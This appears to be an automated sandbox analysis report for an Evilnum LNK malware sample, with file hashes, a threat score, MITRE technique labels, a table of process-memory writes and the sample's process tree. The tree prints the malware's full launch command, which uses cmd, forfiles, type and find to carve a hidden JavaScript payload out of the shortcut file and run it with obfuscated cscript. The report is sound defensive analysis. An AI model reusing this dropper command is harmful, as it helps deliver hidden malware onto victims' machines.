evilnum | 9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5

Analysis

Target

9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5.lnk
Size

69KB
MD5

c32820d1eb296d44c56f8430584d9d69
SHA1

a2dbd75dd079594d36509f5ef84a22f869df68cf
SHA256

9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5
SHA512

7a2fde5f81d4b96314340c412c19e1e4d075c6ef9b52969470d46a4bcafd1bf39deeca97d60921d1d27f665bd15e8ba635bf72a24799899566de4d5ad5226780

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 964 wrote to memory of 268	964	cmd.exe	28
PID 964 wrote to memory of 268	964	cmd.exe	28
PID 964 wrote to memory of 268	964	cmd.exe	28
PID 268 wrote to memory of 760	268	cmd.exe	29
PID 268 wrote to memory of 760	268	cmd.exe	29
PID 268 wrote to memory of 760	268	cmd.exe	29
PID 268 wrote to memory of 860	268	cmd.exe	30
PID 268 wrote to memory of 860	268	cmd.exe	30
PID 268 wrote to memory of 860	268	cmd.exe	30
PID 268 wrote to memory of 452	268	cmd.exe	31
PID 268 wrote to memory of 452	268	cmd.exe	31
PID 268 wrote to memory of 452	268	cmd.exe	31
PID 268 wrote to memory of 1400	268	cmd.exe	32
PID 268 wrote to memory of 1400	268	cmd.exe	32
PID 268 wrote to memory of 1400	268	cmd.exe	32
PID 268 wrote to memory of 1444	268	cmd.exe	33
PID 268 wrote to memory of 1444	268	cmd.exe	33
PID 268 wrote to memory of 1444	268	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\9666285017da522bc193fdfa89ecec0ebb8f382aed04260f9c3dc6520bcb23b5.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "2.png*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "2.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "2.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:860
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1400
- - C:\Windows\system32\cscript.exe
    cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1444

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/964-55-0x000007FEFBC31000-0x000007FEFBC33000-memory.dmp

Filesize
8KB

Download